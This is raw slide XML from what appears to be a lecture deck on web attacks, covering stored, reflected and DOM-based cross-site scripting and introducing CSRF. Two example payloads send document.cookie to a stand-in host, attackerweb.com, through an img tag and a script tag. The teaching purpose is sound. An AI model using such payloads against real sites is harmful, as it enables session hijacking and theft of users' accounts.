              <a:rPr spc="-20" dirty="0"/>
              <a:t>to steal</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="150" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1548384"/>
            <a:ext cx="7857743" cy="439521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651502" y="3889502"/>
            <a:ext cx="349885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675005" algn="l"/>
                <a:tab pos="1142365" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pP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&lt;img	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>s</a:t>
            </a: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rc	=	</a:t>
            </a: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  <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>‘http://attacke</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>r</a:t>
            </a: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  <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>web.com/ </a:t>
            </a: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 steal.php?+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>’/&gt;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30</a:t>
            </a:fld>
            <a:endParaRPr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722623" y="616711"/>
            <a:ext cx="269113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XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t> types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31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1070102" y="1422146"/>
            <a:ext cx="8147684" cy="305562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87020" marR="107314" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="425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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="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Injected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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stored</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="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by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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programs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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used  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to generate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>response </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pages</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-30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later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lr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="3450">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc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  <a:tab pos="1763395" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>:	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Injected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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directly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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sent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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back</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>by  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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programs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lr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="3450">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="274955" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="2590"/>
              </a:lnSpc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  <a:tab pos="2134235" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>DOM‐based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>:	Injected </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>processed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40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client‐side  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>without</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-21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sanitization</a:t>
            </a:r>
            <a:endParaRPr sz="24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66670" y="616711"/>
            <a:ext cx="507936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 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>reflected XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="1676400"/>
            <a:ext cx="2295905" cy="1371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486400" y="1654301"/>
            <a:ext cx="2817876" cy="14828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5800" y="4191000"/>
            <a:ext cx="3659885" cy="61493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43000" y="4724400"/>
            <a:ext cx="2334005" cy="8747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825507" y="5736597"/>
            <a:ext cx="381825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(c)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-35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10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Replace</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-85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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-120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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-110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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of</a:t>
            </a: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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-110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with  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-105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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>code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32</a:t>
            </a:fld>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841486" y="3142741"/>
            <a:ext cx="36607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(a) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Website </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>offers personalized</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-275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views  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>based on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-100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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>username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012682" y="3142741"/>
            <a:ext cx="4511675" cy="2387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384" marR="944880" indent="-635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(b)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-55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The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-114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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-100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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-105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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>displays</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-85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a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-105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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>greeting  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>message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1410"/>
              </a:spcBef>
            </a:pP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(d)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-45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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>An</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-75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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-110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10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-70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5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-100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sends</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-75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user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-130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10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-70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25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>attacker’s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-90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15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="989330">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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&lt;SCRIPT&gt;document.location =  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://attackerweb.com/steal.cgi?</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-90" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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+  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-35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&lt;/SCRIPT&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="18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331973" y="616711"/>
            <a:ext cx="556641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Cross‐Site </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Request Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>(CSRF)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33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93902" y="1471676"/>
            <a:ext cx="7971790" cy="3611879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287020" marR="571500" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="2300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="66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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-120" dirty="0"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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>generation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>arbitrary</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-4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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>remote  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-135" dirty="0"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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>without</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>knowledge</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-1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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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user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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="25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0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>inherent </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>features </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27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browsers</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145" marR="347980" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPts val="1920"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480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Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-114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session</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-2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information</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-70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stored </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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local</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-50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computers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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for</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-12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a  long</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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time</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652145" lvl="1" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-30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browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-12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automatically</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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appends</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-3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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-11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every</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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request</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="245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0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Consequences </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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attacks</a:t>
            </a:r>
            <a:endParaRPr sz="24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15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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Depends</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-7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on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-9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what</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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requests</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-4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intended</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-114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do</a:t>
            </a:r>
            <a:endParaRPr sz="20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10" dirty="0">
